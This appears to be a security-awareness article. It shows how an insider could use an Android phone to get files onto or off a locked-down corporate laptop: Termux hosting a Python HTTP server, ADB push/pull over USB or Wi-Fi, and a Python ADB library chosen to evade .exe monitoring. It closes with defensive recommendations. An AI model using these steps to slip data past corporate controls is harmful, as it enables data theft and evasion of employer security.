Bypassing Corporate Restrictions

Internal Threats Companies Face: Unseen Risks

Organizations often issue company laptops with strict security policies to safeguard sensitive data and maintain the integrity of their IT environment. One of the common restrictions is the prohibition of USB devices in the workplace, as these devices are widely recognized as potential conduits for data breaches or malware intrusions. As a result, employees are not allowed to connect USB devices to their laptops or even bring them into the office premises.

However, despite these measures, employees are permitted to carry smartphones — essential tools for communication and personal use. When connected to company-provided laptops, these devices are usually restricted from transferring data to or from the corporate network. On the surface, this seems like an effective solution, making it difficult for anyone to transfer data from external sources to a company laptop or vice-versa.

But here lies an overlooked security loophole: a malicious actor can potentially exploit their Android smartphone as a tool to bypass these restrictions and facilitate unauthorized data transfer.

Enabling Developer Mode on Your Android Smartphone

To leverage advanced functionalities such as USB debugging and other developer features, you first need to enable Developer Mode on your Android device. Here’s a step-by-step guide to get started:

1. Open the Settings App
   Go to your phone’s home screen and tap on the Settings icon.
2. Navigate to ‘About Phone’
   Scroll down the settings menu and select About Phone. On some devices, this option may be located under System > About Phone.
3. Find the ‘Build Number’
   Scroll down to locate the Build Number option. This is typically found towards the bottom of the ‘About Phone’ section.
4. Tap on the ‘Build Number’ Repeatedly
   Tap on the Build Number 7 times in quick succession. After a few taps, you’ll see a prompt indicating that you are a few steps away from enabling Developer Mode. Continue tapping until the process is complete.
5. Enter Your Device PIN (if prompted)
   If your device is protected with a PIN, pattern, or password, you will be asked to enter it at this stage.
6. Developer Mode Enabled
   Once the process is complete, you’ll see a message that says, “You are now a developer!”
7. Access Developer Options
   Go back to the main Settings menu. You will now see a new menu called Developer Options (typically located near the bottom of the Settings menu or within the System section).
8. Enable USB Debugging

• Tap on Developer Options.
• Scroll down and toggle the switch next to USB Debugging to enable it.

How Malicious Actors Can Transfer Data

Method 1: Using Termux to Transfer Data via a Local Python Server

How a Malicious Actor Can Exploit Mobile Devices to Transfer Data In or Out of a Corporate Laptop

With the growing security measures implemented by organizations, most employees are restricted from using USB devices or external storage on company-provided laptops. While this helps prevent unauthorized data transfers, malicious actors can still exploit other loopholes. One such method involves using a smartphone with the Termux application to host a local Python server and facilitate data transfers. Here’s how this can be done:

Step-by-Step Breakdown:

Download and Set Up Termux
Begin by downloading Termux from the Google Play Store using the following link:
Termux — Play Store.

Prepare the Files for Transfer
Place all the files you wish to transfer onto your laptop in a designated folder on your smartphone. For example, you can use:

• /sdcard/Download
• /data/local/tmp

Launch Termux and Navigate to the Desired Directory
Open the Termux application on your smartphone and use the cd command to navigate to the folder where the files are located. For example:

cd /sdcard/Download

Install Python in Termux
To host a local server, Python needs to be installed on your device. Install it using the following command:

pkg install python

Host a Simple Python HTTP Server
After installing Python, start a local HTTP server using the command below:
python -m http.server 8080

This command will host a server on port 8080, making your files accessible over the local network.

Access the Files from Your Company Laptop
On the company-provided laptop, open a web browser and enter the smartphone’s IP address along with the port number (e.g., 8080). The URL should look like:
http://192.168.0.106:8080

Replace 192.168.0.106 with the actual IP address of your smartphone.

Potential Security Bypass
If successful, this method would allow the attacker to access and download the hosted files onto the company laptop. However, this approach might not always work as intended. Many organizations deploy robust security solutions such as Zscaler or other network monitoring tools that restrict access to non-whitelisted IP addresses and websites. In such cases, all network traffic, except for approved domains, is blocked by default, making it challenging for malicious actors to exploit this method.

Method 2: Using ADB to Transfer Data between Smartphone and Company Laptop

How a Malicious Actor Can Use ADB (Android Debug Bridge) for Unauthorized Data Transfers

With stringent data security measures in place, companies often limit external device connections to prevent unauthorized data transfers. However, attackers can still exploit advanced tools such as Android Debug Bridge (ADB) to move data between a company-provided laptop and an Android smartphone. This method provides a hidden backdoor for data exfiltration or infiltration using either a USB cable or a wireless ADB connection. Here’s a detailed look at how this can be done:

Step-by-Step Breakdown:

1. Enable Developer Mode on the Smartphone
   First, enable Developer Mode on your Android smartphone by following the steps provided in the earlier section.
2. Download and Set Up Platform Tools on the Laptop
   Download the ADB Platform Tools package from the official Android website using the following link:
   Download Platform Tools
3. Extract the Platform Tools Package
   Extract the downloaded ZIP file to a directory on your laptop. Inside this directory, you will find the adb.exe executable, which will be used to establish the connection.
4. Connect the Smartphone to the Laptop Using a USB Cable
   Use a USB cable to connect your smartphone to the laptop. Ensure that USB Debugging is enabled on your phone (found under Developer Options).

Verify Device Connection
Open the command prompt on your laptop, navigate to the directory where adb.exe is located, and run the following command to check if your device is connected:
adb.exe devices

1. You should see your smartphone listed under List of devices attached. If not, make sure USB Debugging is enabled and your phone is set to File Transfer mode.
2. Using ADB Over Wi-Fi (For Android 11 or Above)
   If you prefer a wireless connection and have a compatible Android version (Android 11 or higher), you can use the following app:
   Wireless ADB — Play Store

• Launch the app and enable the wireless ADB connection by toggling the switch.
• Note the IP address displayed in the app.

3. Now, run the following command on your laptop:

adb.exe connect <IP Address of Your Smartphone>

Replace <IP Address of Your Smartphone> with the IP shown in the app, e.g., 192.168.1.100:5555.

Pulling Files from the Laptop to the Smartphone

To copy files from your company-provided laptop to your smartphone, use the adb pull command:
adb.exe pull <Path to File on Laptop> <Destination Path on Smartphone>

Example:
adb.exe pull D:\Secret.txt /sdcard/Download/

This command will copy the Secret.txt file from the laptop’s D: drive to the Download folder on your smartphone.

Pushing Files from the Smartphone to the Laptop

Similarly, to send files from your smartphone to the laptop, use the adb push command:

adb.exe push <Path to File on Smartphone> <Destination Path on Laptop>

Example:
adb.exe push /sdcard/Download/info.txt D:\Information\

This will copy info.txt from the smartphone’s Download folder to the D:\Information directory on the laptop.

Many organizations block the execution of .exe files or implement network security controls that can detect and prevent unauthorized ADB connections. In such cases, malicious actors can leverage a Python-based implementation of ADB, bypassing the need for adb.exe. One such library is available on GitHub:

• Google’s Python ADB Library

By using this Python library, attackers can replicate the functionality of ADB without triggering security alerts that are configured to monitor .exe file executions.

Recommendations to Prevent Unauthorized Data Transfers:

1. Implement Network and Device Restrictions
   Use Network Access Control (NAC), Mobile Device Management (MDM), and firewall rules to restrict access to corporate networks and block unauthorized devices or connections.
2. Enforce USB and ADB Security Policies
   Disable USB Debugging on mobile devices, restrict USB ports to charging only and monitor for any ADB connections initiated within the corporate network.
3. Deploy Endpoint Protection and DLP Solutions
   Utilize Endpoint Detection and Response (EDR) and Data Loss Prevention (DLP) tools to monitor, detect, and block unauthorized file transfers and access attempts.
4. Adopt Application and URL Whitelisting
   Limit software installations and network access to only approved applications and URLs, and block tools like Termux or untrusted Python libraries that can be used for data exfiltration.
5. Conduct Employee Training and Awareness
   Educate employees on security best practices, the dangers of unauthorized device connections, and how to recognize internal threats.
6. Implement Zero Trust and Regular Security Audits
   Adopt a zero-trust approach for continuous verification of device access and regularly conduct security assessments and penetration testing to identify and mitigate vulnerabilities.